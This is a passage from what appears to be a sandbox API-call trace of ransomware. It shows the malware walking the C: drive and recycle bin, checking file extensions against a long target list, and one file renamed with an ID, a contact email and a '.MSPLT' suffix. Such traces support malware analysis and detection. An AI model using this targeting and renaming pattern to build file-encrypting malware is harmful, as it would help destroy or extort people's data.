(lpString1=".kmz", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".kwm") returned 4 [0167.314] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".lasso") returned 6 [0167.314] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0167.314] lstrlenW (lpString=".lbi") returned 4 [0167.314] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".lgf") returned 4 [0167.314] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".lgp") returned 4 [0167.314] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".log") returned 4 [0167.314] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".m1v") returned 4 [0167.314] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".m4a") returned 4 [0167.314] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".m4v") returned 4 [0167.314] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".max") returned 4 [0167.315] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".md") returned 3 [0167.315] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0167.315] lstrlenW (lpString=".mda") returned 4 [0167.315] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mdb") returned 4 [0167.315] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mde") returned 4 [0167.315] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mdf") returned 4 [0167.315] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mdw") returned 4 [0167.315] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mef") returned 4 [0167.315] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mft") returned 4 [0167.315] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mfw") returned 4 [0167.315] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mht") returned 4 [0167.315] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mhtml") returned 6 [0167.315] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0167.315] lstrlenW (lpString=".mka") returned 4 [0167.315] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0167.315] lstrlenW (lpString=".mkidx") returned 6 [0167.315] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0167.315] lstrlenW (lpString=".mkv") returned 4 [0167.315] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mos") returned 4 [0167.316] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mov") returned 4 [0167.316] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mp3") returned 4 [0167.316] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mp4") returned 4 [0167.316] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mpeg") returned 5 [0167.316] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0167.316] lstrlenW (lpString=".mpg") returned 4 [0167.316] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mpv") returned 4 [0167.316] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mrw") returned 4 [0167.316] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".msg") returned 4 [0167.316] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".mxl") returned 4 [0167.316] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".myd") returned 4 [0167.316] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".myi") returned 4 [0167.316] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".nef") returned 4 [0167.316] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0167.316] lstrlenW (lpString=".nrw") returned 4 [0167.316] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".obj") returned 4 [0167.317] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".odb") returned 4 [0167.317] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".odc") returned 4 [0167.317] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".odm") returned 4 [0167.317] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".odp") returned 4 [0167.317] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".ods") returned 4 [0167.317] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".oft") returned 4 [0167.317] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".one") returned 4 [0167.317] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".onepkg") returned 7 [0167.317] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0167.317] lstrlenW (lpString=".onetoc2") returned 8 [0167.317] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0167.317] lstrlenW (lpString=".opt") returned 4 [0167.317] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".oqy") returned 4 [0167.317] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".orf") returned 4 [0167.317] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".p12") returned 4 [0167.317] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0167.317] lstrlenW (lpString=".p7b") returned 4 [0167.318] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".p7c") returned 4 [0167.318] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pam") returned 4 [0167.318] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pbm") returned 4 [0167.318] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pct") returned 4 [0167.318] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pcx") returned 4 [0167.318] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pdd") returned 4 [0167.318] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pdf") returned 4 [0167.318] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pdp") returned 4 [0167.318] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pef") returned 4 [0167.318] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pem") returned 4 [0167.318] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pff") returned 4 [0167.318] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pfm") returned 4 [0167.318] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pfx") returned 4 [0167.318] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0167.318] lstrlenW (lpString=".pgm") returned 4 [0167.318] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0167.319] lstrlenW (lpString=".php") returned 4 [0167.319] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0167.319] lstrlenW (lpString=".php3") returned 5 [0167.319] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0167.319] lstrlenW (lpString=".php4") returned 5 [0167.319] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0167.319] lstrlenW (lpString=".php5") returned 5 [0167.319] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0167.319] lstrlenW (lpString=".phtml") returned 6 [0167.319] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0167.319] lstrlenW (lpString=".pict") returned 5 [0167.319] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0167.319] lstrlenW (lpString=".pl") returned 3 [0167.319] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0167.319] lstrlenW (lpString=".pls") returned 4 [0167.319] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0167.319] lstrlenW (lpString=".pm") returned 3 [0167.319] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0167.319] lstrlenW (lpString=".png") returned 4 [0167.319] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0167.319] lstrlenW (lpString=".pnm") returned 4 [0167.319] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0167.319] lstrlenW (lpString=".pot") returned 4 [0167.319] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0167.319] lstrlenW (lpString=".potm") returned 5 [0167.319] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0167.319] lstrlenW (lpString=".potx") returned 5 [0167.319] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0167.320] lstrlenW (lpString=".ppa") returned 4 [0167.320] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".ppam") returned 5 [0167.320] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0167.320] lstrlenW (lpString=".ppm") returned 4 [0167.320] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".pps") returned 4 [0167.320] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".ppsm") returned 5 [0167.320] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0167.320] lstrlenW (lpString=".ppt") returned 4 [0167.320] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".pptm") returned 5 [0167.320] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0167.320] lstrlenW (lpString=".pptx") returned 5 [0167.320] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0167.320] lstrlenW (lpString=".prn") returned 4 [0167.320] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".ps") returned 3 [0167.320] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0167.320] lstrlenW (lpString=".psb") returned 4 [0167.320] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".psd") returned 4 [0167.320] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".pst") returned 4 [0167.320] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".ptx") returned 4 [0167.320] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0167.320] lstrlenW (lpString=".pub") returned 4 [0167.321] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0167.321] lstrlenW (lpString=".pwm") returned 4 [0167.321] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0167.321] lstrlenW (lpString=".pxr") returned 4 [0167.321] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0167.321] lstrlenW (lpString=".py") returned 3 [0167.321] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0167.321] lstrlenW (lpString=".qt") returned 3 [0167.321] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0167.321] lstrlenW (lpString=".r3d") returned 4 [0167.321] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0167.321] lstrlenW (lpString=".raf") returned 4 [0167.321] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0167.321] lstrlenW (lpString=".rar") returned 4 [0167.321] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0167.321] lstrlenW (lpString=".raw") returned 4 [0167.321] lstrcmpiW (lpString1=".raw", lpString2="SPLT") returned -1 [0167.321] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0167.321] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0167.322] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0167.651] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0167.651] FindClose (in: hFindFile=0x802098 | out: hFindFile=0x802098) returned 1 [0167.652] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0167.652] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0167.652] FindClose (in: hFindFile=0x802118 | out: hFindFile=0x802118) returned 1 [0167.652] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0167.834] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0167.834] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0167.834] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$Recycle.Bin") returned 1 [0167.834] lstrlenW (lpString="$Recycle.Bin") returned 12 [0167.834] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$Recycle.Bin") returned 1 [0167.834] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e80050 [0167.835] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0167.835] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x801e98 [0167.835] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0167.835] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0167.835] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18") returned 24 [0167.835] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$Recycle.Bin\\S-1-5-18") returned 1 [0167.836] lstrlenW (lpString="S-1-5-18") returned 8 [0167.836] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="S-1-5-18") returned -1 [0167.836] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0167.836] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18") returned 24 [0167.836] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x58e6ddfa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801f58 [0167.836] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x58e6ddfa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.836] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x58e6ddfa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58e6ddfa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e6ddfa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 1 [0167.836] lstrlenW (lpString="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 55 [0167.836] lstrlenW (lpString=".1cd") returned 4 [0167.836] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0167.836] lstrlenW (lpString=".3ds") returned 4 [0167.836] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0167.836] lstrlenW (lpString=".3fr") returned 4 [0167.836] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0167.836] lstrlenW (lpString=".3g2") returned 4 [0167.836] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0167.836] lstrlenW (lpString=".3gp") returned 4 [0167.836] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0167.836] lstrlenW (lpString=".7z") returned 3 [0167.836] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0167.837] lstrlenW (lpString=".accda") returned 6 [0167.837] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0167.837] lstrlenW (lpString=".accdb") returned 6 [0167.837] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0167.837] lstrlenW (lpString=".accdc") returned 6 [0167.837] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0167.837] lstrlenW (lpString=".accde") returned 6 [0167.837] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0167.837] lstrlenW (lpString=".accdt") returned 6 [0167.837] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0167.837] lstrlenW (lpString=".accdw") returned 6 [0167.837] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0167.837] lstrlenW (lpString=".adb") returned 4 [0167.837] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0167.837] lstrlenW (lpString=".adp") returned 4 [0167.837] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0167.837] lstrlenW (lpString=".ai") returned 3 [0167.837] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0167.837] lstrlenW (lpString=".ai3") returned 4 [0167.837] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0167.837] lstrlenW (lpString=".ai4") returned 4 [0167.837] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0167.837] lstrlenW (lpString=".ai5") returned 4 [0167.837] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0167.837] lstrlenW (lpString=".ai6") returned 4 [0167.837] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0167.837] lstrlenW (lpString=".ai7") returned 4 [0167.838] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".ai8") returned 4 [0167.838] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".anim") returned 5 [0167.838] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0167.838] lstrlenW (lpString=".arw") returned 4 [0167.838] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".as") returned 3 [0167.838] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0167.838] lstrlenW (lpString=".asa") returned 4 [0167.838] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".asc") returned 4 [0167.838] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".ascx") returned 5 [0167.838] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0167.838] lstrlenW (lpString=".asm") returned 4 [0167.838] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".asmx") returned 5 [0167.838] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0167.838] lstrlenW (lpString=".asp") returned 4 [0167.838] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".aspx") returned 5 [0167.838] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0167.838] lstrlenW (lpString=".asr") returned 4 [0167.838] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".asx") returned 4 [0167.838] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0167.838] lstrlenW (lpString=".avi") returned 4 [0167.839] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".avs") returned 4 [0167.839] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".backup") returned 7 [0167.839] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0167.839] lstrlenW (lpString=".bak") returned 4 [0167.839] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".bay") returned 4 [0167.839] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".bd") returned 3 [0167.839] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0167.839] lstrlenW (lpString=".bin") returned 4 [0167.839] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".bmp") returned 4 [0167.839] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".bz2") returned 4 [0167.839] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".c") returned 2 [0167.839] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0167.839] lstrlenW (lpString=".cdr") returned 4 [0167.839] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".cer") returned 4 [0167.839] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".cf") returned 3 [0167.839] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0167.839] lstrlenW (lpString=".cfc") returned 4 [0167.839] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0167.839] lstrlenW (lpString=".cfm") returned 4 [0167.840] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".cfml") returned 5 [0167.840] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0167.840] lstrlenW (lpString=".cfu") returned 4 [0167.840] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".chm") returned 4 [0167.840] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".cin") returned 4 [0167.840] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".class") returned 6 